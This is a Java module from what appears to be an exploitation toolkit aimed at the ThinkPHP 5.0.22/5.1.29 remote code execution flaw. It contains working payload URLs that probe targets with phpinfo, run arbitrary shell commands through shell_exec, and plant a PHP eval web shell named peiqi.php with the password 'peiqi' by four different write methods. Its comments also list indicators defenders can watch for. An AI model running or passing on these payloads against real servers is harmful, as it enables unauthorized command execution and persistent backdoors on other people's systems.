package exploit;
import com.github.kevinsawicki.http.HttpRequest;
import util.BasePayload;
import util.Module;
import util.Result;
import java.util.ArrayList;
/**
* Author 莲花 2021/6/17
*/
// Affects versions below v5.0.23 and v5.1.31
/**
 * Vulnerability module for the ThinkPHP 5.0.22 / 5.1.29 remote code execution
 * issue (the affected version range is stated in the comment above this class).
 *
 * <p>Every method here builds request URLs from the caller-supplied base
 * {@code url} plus the module name returned by {@code Module.getModule}, sends
 * them with {@code HttpRequest.get}, and reports the outcome as a {@link Result}.
 * All requests share one recognisable shape: a {@code s=} routing parameter that
 * names {@code \think\app/invokefunction} (or a {@code \think\...\driver} class)
 * followed by {@code function=} / {@code vars[...]=} arguments. From a defensive
 * standpoint that query-string pattern is what every request emitted by this
 * class has in common, and is therefore the natural thing to alert on in
 * web-server access logs or a WAF.
 *
 * <p>Error handling is the same in all three methods: any exception thrown while
 * sending a request is printed with {@code printStackTrace()} and otherwise
 * swallowed, so the caller cannot distinguish a network failure from a negative
 * result. Only {@code new Module()} / {@code getModule(url)}, which run before
 * the {@code try} blocks, can propagate an exception out of these methods.
 */
public class tp5022_5129 implements BasePayload {
/**
 * Probes {@code url} for the vulnerability by requesting three candidate URLs
 * in order and returning as soon as one response body contains
 * {@code "PHP Version"}, i.e. looks like {@code phpinfo()} output.
 *
 * @param url base URL of the target; {@code "/?s=..."} is appended directly,
 *     so a trailing slash on {@code url} would be doubled
 * @return a positive {@link Result} carrying the first URL whose response
 *     matched, or a negative one whose payload string is empty
 * @throws Exception declared on the signature; in practice only the
 *     {@code Module} calls above the loop can throw, since the loop body
 *     catches, prints and ignores every exception and moves on to the next URL
 */
@Override
public Result checkVUL(String url) throws Exception {
// Marker text expected in the response when the probe succeeds; each of the
// three URLs below asks the target to render phpinfo()-style output.
String CheckStr = "PHP Version";
Module m = new Module();
String module = m.getModule(url);
// Double-brace initialisation: an anonymous ArrayList subclass whose instance
// initialiser captures url and module. Three variants of the same route are
// tried: invokefunction+phpinfo, invokefunction+assert, and the php view driver.
ArrayList<String> payload_urls = new ArrayList<String>() {{
add(url + "/?s=/" + module + "/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1");
add(url + "/?s=/" + module + "/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()");
add(url + "/?s=/" + module + "/\\think\\view\\driver\\php/display&content=<?php%20phpinfo();?>");
}};
for (String payload_url : payload_urls) {
try {
HttpRequest req1 = HttpRequest.get(payload_url);
// First body containing the marker wins; the matching URL is returned as evidence.
if (req1.body().contains(CheckStr)) {
return new Result(true, "ThinkPHP 5.0.22/5.1.29 RCE", payload_url);
}
} catch (Exception e) {
// Printed and swallowed so the remaining URLs are still tried.
e.printStackTrace();
}
}
return new Result(false, "ThinkPHP 5.0.22/5.1.29 RCE", "");
}
/**
 * Sends a single request that asks the vulnerable route to pass {@code cmd} to
 * {@code shell_exec} and returns the raw response body.
 *
 * <p>{@code cmd} is concatenated into the query string unchanged, so the exact
 * command text is recorded in the target's web-server access log - the artefact
 * an incident responder would look for when reconstructing what was run.
 *
 * <p>No {@code @Override} here, so whether this method is part of the
 * {@code BasePayload} contract cannot be told from this file.
 *
 * @param url base URL of the target
 * @param cmd command string placed in {@code vars[1][]}
 * @return {@code Result(true, null, body)} whenever the request completes;
 *     {@code true} only means a response was received - nothing inspects the
 *     body - or {@code Result(false, null, null)} if the request threw. The
 *     message field is always {@code null}.
 * @throws Exception only from {@code Module.getModule}, which runs outside the
 *     {@code try} block
 */
public Result exeVUL(String url, String cmd) throws Exception {
Module m = new Module();
String module = m.getModule(url);
try {
String payload_url = url + "/?s=/" + module + "/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=" + cmd;
// The response body is returned verbatim; success is not verified.
String res = HttpRequest.get(payload_url).body();
return new Result(true, null, res);
} catch (Exception e) {
// Printed and swallowed; the caller only sees the negative Result below.
e.printStackTrace();
}
return new Result(false, null, null);
}
/**
 * Tries four URLs, each intended to make the target create {@code peiqi.php}
 * at the site root, and after every attempt checks whether
 * {@code url + "/peiqi.php"} answers with HTTP 200.
 *
 * <p>Indicators this leaves on an affected host: a file named {@code peiqi.php}
 * at the site root containing an {@code eval($_POST['peiqi'])} stub, plus the
 * corresponding request lines in the access log. Note that the 200 check runs
 * after every attempt regardless of outcome and the write response
 * ({@code res}) is never inspected, so a pre-existing or unrelated
 * {@code /peiqi.php} would also be reported as success.
 *
 * <p>No {@code @Override} here, so whether this method is part of the
 * {@code BasePayload} contract cannot be told from this file.
 *
 * @param url base URL of the target
 * @return a positive {@link Result} whose payload string is the shell URL
 *     followed by the literal text {@code " Pass:peiqi"}, or
 *     {@code Result(false, null, null)} if no attempt produced a 200
 * @throws Exception only from {@code Module.getModule}, which runs outside the
 *     loop
 */
public Result getShell(String url) throws Exception {
Module m = new Module();
String module = m.getModule(url);
// Double-brace initialisation capturing url and module. Four write primitives
// are tried in turn: file_put_contents (two encodings), copy, and the template
// file driver's write action.
ArrayList<String> payload_urls = new ArrayList<String>() {{
add(url + "/?s=/" + module + "/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=peiqi.php&vars[1][]=<?php%20@eval($_POST[%27peiqi%27])?>");
add(url + "/?s=/" + module + "/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=peiqi.php&vars[1][1]=<?php /*1111*//***/file_put_contents/*1**/(/***/'peiqi.php'/**/,'/***/<?php%20@eval($_POST[%27peiqi%27])?>/***/')/**/;/**/?>");
add(url + "/?s=/" + module + "/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=copy&vars[1][0]='<?php%20@eval($_POST[%27peiqi%27])?>'&vars[1][1]=peiqi.php");
add(url + "/?s=/" + module + "/\\think\\template\\driver\\file/write&cacheFile=peiqi.php&content=<?php%20@eval($_POST[%27peiqi%27])?>");
}};
for (String payload_url : payload_urls) {
try {
// res is read but never used: the write request's response is not checked.
String res = HttpRequest.get(payload_url).body();
// Existence check: a 200 on the expected path is taken as proof of success.
int code = HttpRequest.get(url + "/peiqi.php").code();
if (code == 200) {
return new Result(true, null, url + "/peiqi.php Pass:peiqi");
}
} catch (Exception e) {
// Printed and swallowed so the remaining URLs are still tried.
e.printStackTrace();
}
}
return new Result(false, null, null);
}
}